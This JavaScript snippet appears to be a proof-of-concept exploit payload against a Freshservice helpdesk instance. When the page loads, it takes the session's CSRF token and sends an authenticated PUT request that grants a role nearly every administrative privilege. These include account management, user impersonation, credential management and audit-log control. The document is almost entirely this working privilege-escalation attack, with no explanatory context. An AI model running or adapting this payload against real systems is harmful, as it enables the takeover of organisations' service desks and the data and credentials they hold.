function loadDoc1() {
    const XCsrfToken = document.getElementsByName('csrf-token')[0].getAttribute('content');
    var xhttp = new XMLHttpRequest();
    xhttp.open("PUT", "https://lap-dark.freshservice.com/api/_/roles/59000081991", true)
    xhttp.setRequestHeader("X-Csrf-Token", XCsrfToken);
    xhttp.setRequestHeader("Content-type", "application/json");
    xhttp.withCredentials = true;
    xhttp.send('{"privileges":["admin_tasks","manage_account","view_admin","manage_users","export_agents","assume_agent_identity","manage_team_dashboards","view_schedules","override_shifts","manage_schedules","manage_canned_responses","manage_dispatch_rules","manage_supervisor_rules","manage_scenario_automation_rules","manage_email_settings","manage_ticket_templates","manage_change_templates","manage_pir_templates","manage_configuration_settings","view_contacts","export_contacts","manage_contacts","assume_contact_identity","delete_contact","view_department","manage_department","delete_department","edit_service_catalog","delete_service_catalog","delete_service_item_fields","manage_change_lifecycle","manage_status_page_maintenances","manage_closure_rules","schedule_tickets","manage_agent_availability","manage_all_projects","manage_fields_and_tags","manage_restricted_field_group_placeholders","manage_business_calendars_and_sla_policies","configure_gamification","manage_sandbox","manage_credentials","manage_audit_logs","configure_alert_management","configure_financial_management","manage_status_page_configs","manage_solutions","analytics_view_users","analytics_edit_users","analytics_manage_users","analytics_view_groups","analytics_edit_groups","analytics_manage_groups","analytics_view_departments","analytics_edit_departments","analytics_manage_departments","analytics_view_orchestration","analytics_edit_orchestration","analytics_manage_orchestration","analytics_view_virtual_agent","analytics_edit_virtual_agent","analytics_manage_virtual_agent","analytics_view_oncall","analytics_edit_oncall","analytics_manage_oncall","analytics_view_kbase","analytics_edit_kbase","analytics_manage_kbase","manage_customer_satisfaction_surveys","edit_surveys","create_surveys","view_surveys","delete_surveys","view_triggers","create_triggers","edit_triggers","delete_triggers","analytics_view_copilot","analytics_edit_copilot","analytics_manage_copilot"]}');
}

window.onload = loadDoc1();
